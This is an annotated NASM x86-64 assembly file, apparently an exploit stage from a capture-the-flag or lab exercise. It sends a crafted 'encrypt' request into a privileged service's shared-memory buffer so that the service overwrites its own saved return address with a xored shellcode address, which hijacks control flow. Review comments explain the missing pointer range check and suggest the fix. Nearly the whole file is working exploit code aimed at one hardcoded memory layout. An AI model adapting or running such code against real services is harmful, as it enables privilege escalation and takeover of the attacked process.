;-----------------------------------------------------------------------
; Syntax: NASM (Intel operand order), 64-bit code. Entry point: _start.
;
; What the code does, as far as this file shows:
;   1. calls decrement_sem with edi = dword stored at user_kernel_semid
;      and esi = 0
;   2. writes four qwords into the buffer whose address is stored at
;      user_kernel_shm: the value 92 ("encrypt"), a pointer to an 8-byte
;      value pushed on the stack, the qword held at write_target, and 8
;   3. calls increment_sem with the same two arguments
;   4. stops on int3
;
; Field meanings at +8/+16/+24 (source pointer, destination pointer,
; length) are inferred from the values stored -- confirm against the
; request layout of the program this talks to.
;
; NOTE(review): the qword stored at +16 is the address the author labels
; "do_encrypt return addr", i.e. the request names a saved return address
; as the place its output goes. That can only have an effect if the
; handler for code 92 accepts whatever destination it is given --
; presumably it performs no range check. The service-side fix is to
; verify that both pointers and the length stay inside the caller's own
; buffer before acting on a request.
;
; NOTE(review): every address below is an absolute constant, so the file
; is tied to one specific memory layout of the target (presumably a
; non-PIE build -- confirm).
;-----------------------------------------------------------------------

[BITS 64]

; Absolute addresses taken from the original inline comments.
USER_KERNEL_SEMID   equ 0x6024a8        ; dword: semaphore id
USER_KERNEL_SHM     equ 0x602498        ; qword: pointer to the shared request buffer
DECREMENT_SEM       equ 0x401A90        ; routine called before the buffer is filled
INCREMENT_SEM       equ 0x401AC0        ; routine called after the buffer is filled

; Request buffer contents (offset 0 holds the request code).
REQ_ENCRYPT         equ 92              ; request code, labelled "encrypt"
REQ_SRC             equ 8               ; presumably source pointer -- confirm
REQ_DST             equ 16              ; presumably destination pointer -- confirm
REQ_LEN             equ 24              ; presumably byte count -- confirm
XFER_LEN            equ 0x8             ; matches the single qword pushed below

section .text
global _start

_start:
        ; decrement_sem(semid, 0)
        mov     edi, [USER_KERNEL_SEMID]
        xor     esi, esi
        mov     eax, DECREMENT_SEM
        call    rax

        ; Put the 8-byte value on the stack so rsp can serve as its address.
        push    qword [rel xored_value]

        ; Fill in the request.
        mov     rax, [USER_KERNEL_SHM]          ; rax = request buffer
        mov     qword [rax], REQ_ENCRYPT
        mov     qword [rax + REQ_SRC], rsp      ; -> the qword just pushed
        mov     rcx, [rel write_target]
        mov     qword [rax + REQ_DST], rcx
        mov     qword [rax + REQ_LEN], XFER_LEN

        ; increment_sem(semid, 0)
        mov     edi, [USER_KERNEL_SEMID]
        xor     esi, esi
        mov     eax, INCREMENT_SEM
        call    rax

        int3                                    ; breakpoint trap; nothing follows

; Constants embedded after the code and read RIP-relative.
xored_value:
        dq      0x7473656572628072              ; xored_shellcode_addr
write_target:
        dq      0x60007cfd8                     ; do_encrypt return addr